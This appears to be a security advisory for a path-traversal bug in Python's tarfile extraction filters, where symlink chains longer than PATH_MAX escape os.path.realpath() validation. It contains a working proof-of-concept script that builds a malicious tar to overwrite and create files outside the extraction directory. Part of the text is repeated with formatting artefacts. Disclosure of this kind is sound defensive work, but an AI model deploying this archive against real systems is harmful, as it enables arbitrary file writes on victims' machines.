Summary
Python's TarFile.extractall()
and TarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementations tar_filter
("tar") and data_filter
("data"), each with differing checks to improve the safety of tarfile extraction.
A bug exists when processing a path with symlinks is shorter than PATH_MAX
, but longer than PATH_MAX
when the symlinks are substituted by os.path.realpath()
. Any symlinks that are beyond PATH_MAX
are not expanded.
os.path.realpath()
is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later during extractall()
or extract()
the paths are used without passing them through os.path.realpath()
.
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Severity
Critical - Anyone using the TarFile.extractall()
or TarFile.extract()
with filter="data"
or filter="tar"
, directly or indirectly, must patch immediately, or introduce other mitigating controls.
Proof of Concept
This proof-of-concept assumes it is being run under /home/username
.
The tar file created in this PoC will modify the /home/username/flag/flag
file that exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile
.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
- Prepare the environment
$ pwd
/home/username
$ mkdir flag
$ echo "hello world" > flag/flag
- Prepare the tar file
Open a Python interpreter and run the following code (can be copy and pasted).
import tarfile
import os
import io
import sys
# 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896
# on OSX), leaving 128 bytes for a prefix and at least a few chars of the link
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop"
path = ""
with tarfile.open("poc.tar", mode="x") as tar:
# populate the symlinks and dirs that expand in os.path.realpath()
for i in steps:
a = tarfile.TarInfo(os.path.join(path, comp))
a.type = tarfile.DIRTYPE
tar.addfile(a)
b = tarfile.TarInfo(os.path.join(path, i))
b.type = tarfile.SYMTYPE
b.linkname = comp
tar.addfile(b)
path = os.path.join(path, comp)
# create the final symlink that exceeds PATH_MAX and simply points to the
# top dir. this allows *any* path to be appended.
# this link will never be expanded by os.path.realpath(), nor anything after it.
linkpath = os.path.join("/".join(steps), "l"*254)
l = tarfile.TarInfo(linkpath)
l.type = tarfile.SYMTYPE
l.linkname = ("../" * len(steps))
tar.addfile(l)
# make a symlink outside to keep the tar command happy
e = tarfile.TarInfo("escape")
e.type = tarfile.SYMTYPE
e.linkname = linkpath + "/../flag"
tar.addfile(e)
# use the symlinks above, that are not checked, to create a hardlink
# to a file outside of the destination path
f = tarfile.TarInfo("flaglink")
f.type = tarfile.LNKTYPE
f.linkname = "escape/flag"
tar.addfile(f)
# now that we have the hardlink we can overwrite the file
content = b"overwrite\n"
c = tarfile.TarInfo("flaglink")
c.type = tarfile.REGTYPE
c.size = len(content)
tar.addfile(c, fileobj=io.BytesIO(content))
# we can also create new files as well!
content = b"new!\n"
n = tarfile.TarInfo("escape/newfile")
n.type = tarfile.REGTYPE
n.size = len(content)
tar.addfile(n, fileobj=io.BytesIO(content))
- Extract the tarfile
$ pwd
/home/username
$ ls flag # check the flag dir and file are unchanged
flag
$ cat flag/flag
hello world
$ mkdir test # this is where the tar is extracted
$ mkdir otherdir # this is a dummy dir to keep everything clean
$ cd otherdir
$ python3
Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> c
>>>
CTRL-D
$ cd ..
$ ls flag # the flag dir is different!
flag newfile
$ cat flag/flag
overwrite
$ cat flag/newfile
new!
Timeline
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025
Summary
Python's
TarFile.extractall()
andTarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementationstar_filter
("tar") anddata_filter
("data"), each with differing checks to improve the safety of tarfile extraction.A bug exists when processing a path with symlinks is shorter than
PATH_MAX
, but longer thanPATH_MAX
when the symlinks are substituted byos.path.realpath()
. Any symlinks that are beyondPATH_MAX
are not expanded.os.path.realpath()
is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later duringextractall()
orextract()
the paths are used without passing them throughos.path.realpath()
.This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Severity
Critical - Anyone using the
TarFile.extractall()
orTarFile.extract()
withfilter="data"
orfilter="tar"
, directly or indirectly, must patch immediately, or introduce other mitigating controls.Proof of Concept
This proof-of-concept assumes it is being run under
/home/username
.The tar file created in this PoC will modify the
/home/username/flag/flag
file that exists outside of the destination path the tar file is extracted into. The tar file will also create/home/username/flag/newfile
.The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
Open a Python interpreter and run the following code (can be copy and pasted).
Timeline
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025